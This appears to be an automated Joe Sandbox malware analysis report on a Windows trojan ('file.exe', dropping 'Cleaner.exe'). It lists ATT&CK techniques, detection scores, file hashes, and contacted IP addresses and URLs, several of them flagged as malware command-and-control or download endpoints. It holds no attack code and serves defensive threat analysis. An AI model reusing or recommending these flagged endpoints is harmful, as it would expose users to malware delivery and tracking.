Source: Yara match	File source: 00000000.00000000.252969697.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.260976008.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.253211211.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.257226679.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.252332121.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	Path Interception	12 Process Injection	11 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	21 Virtualization/Sandbox Evasion	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	12 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	123 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Timestomp	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	48%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\dll[1]	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\dll[1]	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\soft[1]	29%	ReversingLabs	Win32.Trojan.Lazy
C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Bunifu_UI_v1.5.3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Bunifu_UI_v1.5.3.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	29%	ReversingLabs	Win32.Trojan.Lazy

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.file.exe.400000.21.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.31.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.7.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.19.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.5.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.23.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.13.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.25.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.9.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.17.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.11.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.15.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.29.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.27.unpack	100%	Avira	HEUR/AGEN.1250671		Download File
0.0.file.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1250671		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte	100%	URL Reputation	malware
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://ctldl.windowsup	0%	URL Reputation	safe
https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.carterandcone.com.	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte	100%	URL Reputation	malware
http://www.jiyu-kobo.co.jp/.	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://107.182.129.235/storage/ping.php	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.fontbureau.comH	0%	URL Reputation	safe
http://107.182.129.235/storage/extension.php	0%	URL Reputation	safe
http://85.31.46.167/software.php	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/H	0%	URL Reputation	safe
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst	100%	URL Reputation	malware
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
https://iplogger.orgx	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/x	0%	URL Reputation	safe
http://www.founder.com.cn/cn8	0%	URL Reputation	safe
https://g-cleanit.hk	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.zhongyicts.com.cno.	0%	URL Reputation	safe
http://171.22.30.106/library.php	100%	URL Reputation	malware
http://www.sajatypeworks.comb.	0%	Avira URL Cloud	safe
http://www.typography.net.	0%	Avira URL Cloud	safe
http://www.sakkal.comx	0%	Avira URL Cloud	safe
http://www.fontbureau.comF.	0%	Avira URL Cloud	safe
http://www.fontbureau.comitu8	0%	Avira URL Cloud	safe
http://www.typography.net.	0%	Virustotal		Browse
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinteIN	100%	Avira URL Cloud	malware
http://www.fontbureau.comvaRegular	0%	Avira URL Cloud	safe
http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cno.X	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/F.	0%	Avira URL Cloud	safe
http://www.typography.netTTF.	0%	Avira URL Cloud	safe
http://www.sandoll.co.kralRegular	0%	Avira URL Cloud	safe
http://www.typography.netF.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
iplogger.org	148.251.234.83	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte	true	URL Reputation: malware	unknown
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte	true	URL Reputation: malware	unknown
http://107.182.129.235/storage/ping.php	false	URL Reputation: safe	unknown
http://107.182.129.235/storage/extension.php	false	URL Reputation: safe	unknown
http://85.31.46.167/software.php	true	URL Reputation: safe	unknown
https://iplogger.org/1Pz8p7	false		high
http://171.22.30.106/library.php	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ctldl.windowsup	file.exe, 00000000.00000000.286113047.0000000000663000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comitu8	Cleaner.exe, 0000001E.00000003.364938213.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174	Cleaner.exe, 0000001E.00000002.631260958.0000022E00001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.tiro.com	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	Cleaner.exe, 0000001E.00000003.372842971.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	Cleaner.exe, 0000001E.00000003.359574972.0000022E6B03B000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.com	Cleaner.exe, 0000001E.00000003.361219972.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.361078584.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designersiva	Cleaner.exe, 0000001E.00000003.372842971.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.sakkal.comx	Cleaner.exe, 0000001E.00000003.362419891.0000022E6B026000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.com.	Cleaner.exe, 0000001E.00000003.361219972.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.comb.	Cleaner.exe, 0000001E.00000003.357923180.0000022E6B025000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com.	Cleaner.exe, 0000001E.00000003.365381080.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.365415203.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.366231899.0000022E6B025000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.365464280.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.364887394.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/.	Cleaner.exe, 0000001E.00000003.362097359.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	Cleaner.exe, 0000001E.00000003.359574972.0000022E6B03B000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.de	Cleaner.exe, 0000001E.00000003.367409088.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Cleaner.exe, 0000001E.00000002.631260958.0000022E00001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.net.	Cleaner.exe, 0000001E.00000003.358138566.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.358211225.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.358174176.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.comF.	Cleaner.exe, 0000001E.00000003.366231899.0000022E6B025000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinteIN	file.exe, 00000000.00000000.286113047.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.279933925.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.266426572.0000000000663000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	Cleaner.exe, 0000001E.00000003.365415203.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.364887394.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comH	Cleaner.exe, 0000001E.00000003.364960603.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.364938213.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cno.X	Cleaner.exe, 0000001E.00000003.360922906.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comvaRegular	Cleaner.exe, 0000001E.00000003.364466049.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.364386372.0000022E6B02F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/H	Cleaner.exe, 0000001E.00000003.361876984.0000022E6B030000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst	file.exe, 00000000.00000000.265432136.000000000019B000.00000004.00000010.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174	file.exe, 00000000.00000003.329174439.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.322735199.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330761545.0000000003960000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.298651598.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.331371122.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323082305.000000000390E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323416274.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.328400230.0000000003943000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.324070957.000000000373E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327501854.0000000003946000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330045945.0000000003734000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.325291539.000000000392E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327061375.000000000373D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327857443.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.326688973.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.332041691.0000000003735000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	Cleaner.exe, 0000001E.00000003.362097359.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://iplogger.org	Cleaner.exe, 0000001E.00000002.631260958.0000022E00001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.orgx	Cleaner.exe, 0000001E.00000002.635650155.0000022E0040E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kralRegular	Cleaner.exe, 0000001E.00000003.359574972.0000022E6B03B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/F.	Cleaner.exe, 0000001E.00000003.361876984.0000022E6B030000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netTTF.	Cleaner.exe, 0000001E.00000003.358138566.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://iplogger.org	Cleaner.exe, 0000001E.00000002.635678816.0000022E00418000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	Cleaner.exe, 0000001E.00000003.360298044.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/x	Cleaner.exe, 0000001E.00000003.361876984.0000022E6B030000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.html	Cleaner.exe, 0000001E.00000003.366066171.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.366036453.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn8	Cleaner.exe, 0000001E.00000003.360298044.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g-cleanit.hk	file.exe, 00000000.00000003.329174439.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.322735199.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330761545.0000000003960000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.298651598.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.331371122.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323082305.000000000390E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323416274.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.328400230.0000000003943000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.324070957.000000000373E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327501854.0000000003946000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330045945.0000000003734000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.325291539.000000000392E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327061375.000000000373D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327857443.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.326688973.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.332041691.0000000003735000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.dr	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	Cleaner.exe, 0000001E.00000003.361876984.0000022E6B030000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.362097359.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netF.	Cleaner.exe, 0000001E.00000003.358138566.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cno.	Cleaner.exe, 0000001E.00000003.360922906.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlll.	Cleaner.exe, 0000001E.00000003.366036453.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/	Cleaner.exe, 0000001E.00000003.364266164.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
148.251.234.83	iplogger.org	Germany		24940	HETZNER-ASDE	false
208.67.104.97	unknown	United States		20042	GRAYSON-COLLIN-COMMUNICATIONSUS	true
85.31.46.167	unknown	Germany		43659	CLOUDCOMPUTINGDE	true
107.182.129.235	unknown	Reserved		11070	META-ASUS	false
171.22.30.106	unknown	Germany		33657	CMCSUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	715158
Start date and time:	2022-10-03 17:41:00 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 58s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.winEXE@21/51@1/5
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 91% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
TCP Packets have been reduced to 100
Excluded domains from analysis (whitelisted): fs.microsoft.com
Execution Graph export aborted for target Cleaner.exe, PID 4628 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_054230ad\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9188960827612409
Encrypted:	false
SSDEEP:	192:/Saa1VfavljH56rL03jDyc/u7sOS274It1hBx:/c2556rgjD/u7sOX4ItN
MD5:	FCCF03A72A3D70F2206DDC19C6DFA1C5
SHA1:	DD27941EF691A6FD3EBD81B2CC1EE6A6B28068E9
SHA-256:	3FBED246A18DD92B2D4CCE8CAA08381D022C71F24F2D9D5066A29A020C54A462
SHA-512:	F949BA205ACCA0508D301BAE31F4968C6652912DE2CA0043CD7FEB518B43E8D8830F9922C05B33F729AA58CCD82BD9D198B485AD9B6FBF56E4554E81FDD44045
Malicious:	true
